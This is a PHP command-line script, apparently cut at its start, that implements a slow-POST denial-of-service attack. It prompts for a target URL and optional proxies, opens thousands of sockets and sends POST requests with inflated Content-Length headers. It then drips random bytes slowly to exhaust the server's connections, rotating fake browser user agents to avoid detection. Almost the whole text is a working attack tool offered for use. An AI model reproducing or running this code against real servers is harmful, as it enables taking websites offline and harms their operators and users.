$host, 'port' => $port, 'path' => $path); return $url; } // Receive a file, give a proxy (returns false on failure) function getRandomProxy($file) { // Should work $file = str_replace("\\","/",$file); // Test the file if( !is_readable($file) ) return false; // Get the file with the proxies $proxies = file_get_contents($file); // Be sure of the line endings $proxies = str_replace( array("\r\n","\r"), "\n", $proxies); // Grab the proxies $proxies = explode("\n",$proxies); foreach($proxies as $key => $value) { $proxies[$key] = explode(":",$value); if( isset($proxies[$key][0]) && isset($proxies[$key][1]) ) { // This allows me to get proxies from lists like // IP:PORT bla bla bla $proxies[$key][1] = explode(" ",$proxies[$key][1]); $proxies[$key][1] = explode("\t",$proxies[$key][1][0]); $proxies[$key][1] = $proxies[$key][1][0]; // The proxy $proxies[$key] = array('host' => $proxies[$key][0], 'port' => $proxies[$key][1]); } else { unset($proxies[$key]); } } unset($key,$value); // Give a random proxy $proxy = null; if( count($proxies) ) { while( !$proxy ) { $rand = mt_rand(0,count($proxies)-1); $proxy = (isset($proxies[$rand]) ? $proxies[$rand] : null); } } // :D if( !$proxy ) return false; else { return $proxy; } } // Returns a random useragent function randomUserAgent() { // Microsoft Windows versions $os = array("5.0","5.1","6.0","6.1"); // Select a random windows $os = $os [ mt_rand(0,count($os)-1) ]; // Select a random browser if( mt_rand(0,1) ) { // Internet Explorer versions $ua[0] = array("4.0","7.0"); $ua[1] = array("4.0","8.0"); $ua[2] = array("5.0","9.0"); // Random IE $ua = $ua [ mt_rand(0,count($ua)-1) ]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})"; } else { // Mozilla Firefox languages $lang = array("en-GB","en-US","es-ES","pt-BR","pt-PT","sv-SE"); // Mozilla Firefox versions $ua[0] = array("","20110319","3.6.16"); $ua[1] = array("","20110420","3.6.17"); // Random FF $ua = $ua [ mt_rand(0,count($ua)-1) ]; $lang = $lang [ mt_rand(0,count($lang)-1) ]; return "Mozilla/5.0 (Windows; U; Windows NT {$os}; {$lang}; rv:{$ua[0]}) Gecko/{$ua[1]} Firefox/{$ua[2]}"; } } // Opens a custom socket and returns it function openCustomSocket($host,$port) { $fp = @fsockopen($host, $port, $errno, $errstr, 1); if (!$fp) return false; stream_set_blocking($fp,0); return $fp; } // Receives a socket and performs the start of a slowPost'ing // Returns Content-Length on success and false on failure function slowPostStart($sock,$host,$port,$path) { // Check the socket if($sock) { // To fix Host header $host = ($port==80) ? $host : $host.":".$port; // Generate a random Content-Length $length = mt_rand(1337,31337); // Do it :D $out = "POST /{$path} HTTP/1.1\r\n"; $out .= "Host: {$host}\r\n"; $out .= "User-Agent: ".randomUserAgent()."\r\n"; $out .= "Accept: */*\r\n"; $out .= "Accept-Encoding: gzip,deflate\r\n"; $out .= "Keep-Alive: ".mt_rand(60,120)."\r\n"; $out .= "Connection: Keep-Alive\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"; $out .= mt_rand(0,1) ? "Referer: http://{$host}/\r\n" : ""; $out .= "Content-Length: {$length}\r\n"; $out .= "\r\n"; @fwrite($sock, $out); return $length; } else { return false; } } // Receives a socket and continues the slowPost'ing function slowPostContinue($sock,$bytes=5) { // Check the $bytes if( intval($bytes) != $bytes ) $bytes=5; // Check the socket if($sock) { // Do it :D $out = ""; for($j=0;$j<$bytes;$j++); { $out .= chr(mt_rand(33,126)); } $out = urlencode($out); @fwrite($sock, $out); return true; } else return false; } //------------------------- // MAiN CODE //------------------------- echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| "; echo PHP_EOL.EXPLOIT_VERSION." by NewEraCracker".PHP_EOL; // Fetch the URL to attack $url = null; if( isset($_SERVER['argv'][1]) ) { $url = $_SERVER['argv'][1]; } if ( !isValidTango($url) ) $url = null; // Fetch proxy to use $proxy['host'] = null; $proxy['port'] = null; $proxy['file'] = false; if( !empty($url) && isset($_SERVER['argv'][2]) ) { if( $proxy = explode(":",$_SERVER['argv'][2]) ) { if( isset($proxy[0]) && isset($proxy[1]) ) { $proxy['host'] = $proxy[0]; $proxy['port'] = $proxy[1]; unset($proxy[0],$proxy[1]); } } if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) ) { $proxy['file'] = true; $proxy['filename'] = $_SERVER['argv'][2]; } } // Ask for proxy if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] ) { $proxy['use'] = null; while( !$proxy['use'] ) { echo PHP_EOL."Do you want to use a proxy [yes/no/file]: "; $proxy['use'] = readSTDIN(); if( strpos(strtolower($proxy['use']),'y') === 0 ) { echo PHP_EOL."Proxy IP: "; $proxy['host'] = readSTDIN(); echo PHP_EOL."Proxy Port: "; $proxy['port'] = readSTDIN(); } elseif( strpos(strtolower($proxy['use']),'n') === 0 ) { break; } elseif( strpos(strtolower($proxy['use']),'f') === 0 ) { echo PHP_EOL."Proxy file: "; $proxy['filename'] = readSTDIN(); if( is_readable($proxy['filename']) ) { $proxy['file'] = true; } else { echo PHP_EOL."Invalid file!".PHP_EOL; $proxy['use'] = null; } } else { $proxy['use'] = null; echo PHP_EOL."Invalid choice!".PHP_EOL; } } unset($proxy['use']); } // Ask for target URL while( !$url ) { echo PHP_EOL."Target url: "; $url = readSTDIN(); if( isValidTango($url) ) break; $url = null; echo PHP_EOL."Invalid target!".PHP_EOL; } // Init @ini_set("default_socket_timeout",1); $url = getParamsFromUrl($url); $proxy['host'] = (!$proxy['host']) ? $url['host'] : $proxy['host']; $proxy['port'] = (!$proxy['port']) ? $url['port'] : $proxy['port']; echo PHP_EOL."IMMA FIRIN MAH LAZOR!".PHP_EOL; // Do it while(true) { $fp = array(); // Start for($i=0;$i<5000;$i++) { // Using Proxy file? if( $proxy['file'] ) { $filename = $proxy['filename']; $proxy = getRandomProxy($filename); if(!$proxy) { echo $filename." is not a valid proxy-list file!"; exit(1); } $proxy['filename'] = $filename; } // Open a new socket if( $fp[$i]['sock'] = openCustomSocket($proxy['host'], $proxy['port']) ) { // Progress bar? echo '+'; // Start a new slowPost if( $_length = slowPostStart($fp[$i]['sock'], $url['host'], $url['port'], $url['path'])) { // Find the lenght if( !isset($fp[$i]['length']) ) { $fp[$i]['length'] = $_length; } } else { // Epic fail? @fclose($fp[$i]['sock']); unset($fp[$i]); } } else { // Epic fail? @fclose($fp[$i]['sock']); unset($fp[$i]); } // Check the current sockets foreach($fp as $_k => $_v) { if($fp[$_k]['length'] > 0) { // Contine old slowPosts $_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5; slowPostContinue($fp[$_k]['sock'],$_length); $fp[$_k]['length'] = $fp[$_k]['length']-$_length; } else { // Close completed slowPosts @fclose($fp[$_k]['sock']); unset($fp[$_k]); } } unset($_k,$_v); } // Restart foreach($fp as $_k => $_v) { @fclose($fp[$_k]['sock']); } }